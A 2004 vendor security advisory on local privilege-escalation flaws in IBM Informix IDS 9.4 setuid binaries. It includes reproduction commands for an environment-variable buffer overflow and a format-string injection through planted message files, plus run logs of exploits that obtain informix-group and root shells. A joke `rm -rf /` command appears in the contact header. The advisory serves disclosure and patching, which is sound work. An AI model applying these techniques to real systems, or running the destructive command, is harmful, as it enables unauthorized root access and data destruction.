SRT2004-01-18-0747 - IBM Informix IDS 9.4 contains multiple vulnerabilities
 Secure Network Operations, Inc.             http://www.secnetops.com/research
Strategic Reconnaissance Team               research[at]secnetops[.]com
Team Lead Contact                           kf[at]secnetops[.]com
Spam Contact                                `rm -rf /`@snosoft.com
Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion 
Detection Systems (IDS), Software Security Validation, and 
Corporate/Private Network Security. Our mission is to facilitate a 
secure and reliable Internet and inter-enterprise communications 
infrastructure through the products and services we offer. 
To learn more about our company, products and services or to request a 
demo of ANVIL FCS please visit our site at http://www.secnetops.com, or 
call us at: 978-263-3829
Quick Summary:
************************************************************************
Advisory Number         : SRT2004-01-18-0747
Product                 : IBM Informix IDS 
Version                 : Version : 9.40.xC[12] (tested 9.40.UC1)
Vendor                  : http://www-3.ibm.com/software/data/informix/
Class                   : Local
Criticality             : High 
Operating System(s)     : *nix 
Notice
************************************************************************
1-2 day Early Warning List:
---------------------------
Secure Network Operations, inc. will very shortly have its own advisory 
notification mailing list. This list will notify you of advisories 1-2 
days in advance of public release to other mailing lists. To subscribe 
please visit http://advisories.secnetops.com in the immediate future. 
30-60 day Early Warning List:
-----------------------------
Our early warning service will notify you of new vulnerabilities 30-60 
days in advance of public release. This service has been created to protect 
companies by allowing them to repair security vulnerabilities before they 
become public knowledge. To purchase a one year subscription to this 
service please contact us at 978-263-3767.
Alert
***********************************************************************
Our advisories will contain full details excluding a working Proof of 
Concept. Our web page will contain our working proof of concept for the 
advisory if it exists. Yes folks this is a policy change for us. We 
will exercise our own disgression in regards to delay of exploit release
vs advisory release. List subscribers will have advanced access to working
proof of concept code depending on the severity and list subscription type. 
Basic Explanation
************************************************************************
High Level Description  : IDS 9.4 contains multiple vulnerabilities
What to do              : Update to patch level IDS 9.40.UC3, 9.30.UC7 
                          and 7.31.UD7 fix pack releases
Basic Technical Details
************************************************************************
Proof Of Concept Status : SNO has Proof of Concept. 
Low Level Description   : Informix Dynamic Server 9.4 is a best-of-breed 
online transaction processing database for enterprise and workgroup 
computing. IDS is built on Dynamic Scalable Architecture that uses 
hardware resources more efficiently and minimizes hardware requirements.
During routine product evalutation we noticed several setuid binaries 
that contained security issues. Our Informix installation came with the 
following setuid and setgid files: 
-rwsr-sr--    1 root     informix 10153315 Jul 19 12:30 ./oninit
-rwsr-sr-x    1 root     informix  1019813 Jul 19 12:30 ./onmode
-rwsr-sr-x    1 root     informix  1066468 Mar 15 11:47 ./onedcu
-rwsr-sr-x    1 root     informix    13443 Mar 15 11:46 ./ifmxgcore
-rwsr-sr-x    1 root     informix  1615730 Jul 19 12:30 ./ontape
-rwsr-sr-x    1 root     informix  1831430 Mar 15 11:51 ./ondblog
-rwsr-sr-x    1 root     informix  1897244 Jul 19 12:30 ./onbar_d
-rwsr-sr-x    1 root     informix  1909871 Jul 19 12:30 ./onsmsync
-rwsr-sr-x    1 root     informix  2143212 Jul 19 12:30 ./onmonitor
-rwsr-sr-x    1 root     informix   511534 Mar 15 11:53 ./sgidsh
-rwsr-sr-x    1 root     informix   511623 Mar 15 11:53 ./mkdbsdir
-rwsr-sr-x    1 root     informix   537232 Jul 19 12:30 ./onshowaudit
-rwsr-sr-x    1 root     informix   948490 Jul 19 12:30 ./onaudit
-rwxr-sr-x    1 informix informix  1063801 Mar 15 11:47 ./xtree
-rwxr-sr-x    1 informix informix  1196928 Jul 19 12:29 ./onspaces
-rwxr-sr-x    1 informix informix  1199645 Jul 19 12:29 ./onparams
-rwxr-sr-x    1 informix informix  1314460 Jul 19 12:29 ./onlog
-rwxr-sr-x    1 informix informix  1438131 Jul 19 12:29 ./oncheck
-rwxr-sr-x    1 informix informix  2235020 Jul 19 12:29 ./onpload
-rwxr-sr-x    1 informix informix  3974843 Jul 19 12:29 ./onstat
-rwxr-sr-x    1 informix informix   539519 Mar 15 11:47 ./onedpu
-rwxr-sr-x    1 informix informix   895422 Jul 19 12:29 ./onload
-rwxr-sr-x    1 informix informix   895424 Jul 19 12:29 ./onunload
Most if not all of the binaries share common exploitable conditions.
The first issue we noticed was a simple buffer overflow in the GL_PATH
environment variable. 
[informix@vegeta bin]$ export GL_PATH=`perl -e 'print "A" x 998'`
[informix@vegeta bin]$ ./xtree
Segmentation fault
A quick run in gdb shows us the following. Smaller string lengths reveal
that this issue may be complicated because of a few free() calls.  
[root@vegeta bin]# export GL_PATH=`perl -e 'print "A" x 3068'`ABCD
(gdb) i r
eax            0x44434241       1145258561
ecx            0x1      1
edx            0x53     83
ebx            0x401f21c0       1075782080
esp            0xbfffcaf0       0xbfffcaf0
ebp            0xbfffd1ac       0xbfffd1ac
esi            0x44434241       1145258561
edi            0xbfffcd4c       -1073754804
eip            0x401361db       0x401361db
...
(gdb) bt
#0  0x401751db in strlen () from /lib/libc.so.6
#1  0x40144c7e in vfprintf () from /lib/libc.so.6
#2  0x4015fb2c in vsprintf () from /lib/libc.so.6
#3  0x4014d02d in sprintf () from /lib/libc.so.6
#4  0x080a2138 in gl_path_search1 ()
[informix@vegeta bin]$ for each in `find . -perm -2000 -user informix`
> do
> echo $each
> $each
> done
./onstat
Segmentation fault
./onspaces
Segmentation fault
./onparams
Segmentation fault
./onload
Segmentation fault
./oncheck
Segmentation fault
./onunload
Segmentation fault
[informix@vegeta bin]$ for each in `find . -perm -4000`
> do  
> echo $each
> $each
> done
./oninit
Segmentation fault
./onmode
Segmentation fault
./onedcu
Segmentation fault
./onshowaudit
Segmentation fault
./onaudit
Segmentation fault
./onbar_d
Segmentation fault
./ondblog
Segmentation fault
./onsmsync
Segmentation fault
./ontape
Segmentation fault
The next vulnerability we discovered is a bit more complex. When Informix
binaries are run they begin to look for several message files. It looks for
them in relation to the INFORMIXDIR environment variable. 
If we set INFORMIXDIR to /tmp we can see it begins searching /tmp for the 
necessary files. 
[root@vegeta bin]# export INFORMIXDIR=/tmp
[root@vegeta bin]# strace ./onmonitor
execve("./onmonitor", ["./onmonitor"], [/* 34 vars */]) = 0
...
open("/tmp/en_us/0333.lco", O_RDONLY|O_LARGEFILE)
open("/tmp/etc/informix.rc", O_RDONLY|O_LARGEFILE)
open("/tmp/os/en_US.819", O_RDONLY|O_LARGEFILE)
open("/tmp/registry", O_RDONLY)
Depending on the application you are exploiting you will see that 
several files are searched for. 
Below we use /usr/informix/bin/oncheck as an example. We can see that it
searches for olutil.iem.
[root@vegeta informix]# bin/oncheck -cc aaa
shared memory not initialized for INFORMIXSERVER '<NULL>'
[root@vegeta bin]# strace bin/oncheck -cc aaa
... 
strcat("/usr/informix/msg/en_us/0333"..., "olutil.iem")
access("/usr/informix/msg/en_us/0333"..., 4)
lseek64(3, 37251, 0, 0, 0)                      
read(3, "shared memory no"..., 55) 
strcpy(0x081da720, "shared memory no"...)
printf("shared memory not initialized for INFORMIXSERV"... 
Since we control the INFORMIXDIR it is fairly trivial for us to inject 
format string messages into the printf() statements that are included 
in order to throw various error messages. 
Since INFORMIXDIR has a lot of critical items in it we must first make a
copy of it. The easiest way of doing this is via multiple symlinks. 
[kf@vegeta kf]$ cd /tmp
[kf@vegeta tmp]$ for each in `find /usr/informix/ -type d`; do mkdir -p ./$each 
; done
[kf@vegeta tmp]$ for each in `find /usr/informix`; do ln -s $each ./$each; done
Since we need to edit the message file we will need to rm the link and
copy the file into the correct location.
[kf@vegeta tmp]$ rm usr/informix/msg/en_us/0333/olutil.iem
[kf@vegeta tmp]$ cp /usr/informix/msg/en_us/0333/olutil.iem 
usr/informix/msg/en_us/0333/
Using the above oncheck example we will need to edit the olutil.iem.
Open up usr/informix/msg/en_us/0333/olutil.iem in vi and search for: 
shared memory not initialized for INFORMIXSERVER '<NULL>'
As a test we can change the text to the following:
^@%x.%x. memory not initialized for INFORMIXSERVER '%s'
Running the binary again shows that we have hit paydirt. 
[kf@vegeta tmp]$ bin/oncheck -cc aaa
81da718.bfffda08. memory not initialized for INFORMIXSERVER '�jhC�'
Obviously if we change the message to the following it becomes more
interesting:
%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
[kf@vegeta tmp]$ bin/oncheck -cc aaa
Segmentation fault
Gdb shows us the obvious...
Program received signal SIGSEGV, Segmentation fault.
0x40144f56 in vfprintf () from /lib/libc.so.6
(gdb) bt
#0  0x40144f56 in vfprintf () from /lib/libc.so.6
#1  0x4014cfb2 in printf () from /lib/libc.so.6
#2  0x0804b946 in main ()
Strace shows us in detail what is going on. 
[080b1a11] strcat("/tmp/usr/informix/msg/en_us/0333"..., "olutil.iem")
[080fc03b] access("/tmp/usr/informix/msg/en_us/0333"..., 4)
[080d9613] lseek64(3, 37251, 0, 0, 0)                                       = 
37251
[080d95f2] read(3, "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"..., 55)               = 55
[080b0207] strcpy(0x081da720, "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"...)        = 
0x081da720
[0804b946] printf("%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"... <unfinished ...>
[40144f56] --- SIGSEGV (Segmentation fault) ---
[ffffffff] +++ killed by SIGSEGV +++
We currently have two different Proof of Concept exploits for the above
mentioned conditions. One takes gid informix and the other uid root. 
The data below shows a test run of each one. 
bash$ ./0x82-Local.InformixIDS -t0 -d /tmp/informix/ -g 999
  IBM Informix IDS 9.40 format string exploit.
  [+] Target Program: /usr/informix/bin/onparams
  [+] .dtors address: 0x81206ec
  [+] Shellcode address: 0xbfffffb3
  [+] flag and pad brute-force mode: (100:0)
  ...
  [*] Found it !!! (102:3)
  [*] Waiting shell ...
      ...
                                 ...
                                        81876d8
                   ...
                  0d for INFORMIXSERVER '(null)'
 sh-2.04$ id
 uid=500(x82) gid=999(informix) groups=500(x82)
and 
 bash$ ./0x82-InformixIDS_r00t -d /tmp/informix/
  IBM Informix IDS 9.40 format string local root exploit.
  [+] Target Program: /usr/informix/bin/ontape
  [+] .dtors address: 0x817c8e4
  [+] Shellcode address: 0xbfffffb3
  [+] flag and pad brute-force mode: (100:0)
  .......................................................
  [*] Found it !!! (212:0)
  [*] Waiting root shell ...
      ...
                                 ...
                                          bfff769c
                    ...
               0guration file $INFORMIXDIR/etc/$ONCONFIG.
 Program over.
 sh-2.04# id
 uid=0(root) gid=0(root) 
Vendor Status           : IBM addressed this issue in a prompt, efficient and 
intelligent manner.
                          Jonathan Leffler really stepped up to the plate so to 
speak, and provided 
                          the SRT with more than enough information regarding 
this issue as well as 
                          the actions taken to resolve this issue!
Bugtraq URL             : To be assigned. 
Disclaimer
----------------------------------------------------------------------
This advisory was released by Secure Network Operations,Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Release of exploit code is done at our 
own discretion. 
----------------------------------------------------------------------
All content of this advisory is property of Secure Network Operations.
----------------------------------------------------------------------
Secure Network Operations, Inc. || http://www.secnetops.com
"Embracing the future of technology, protecting you."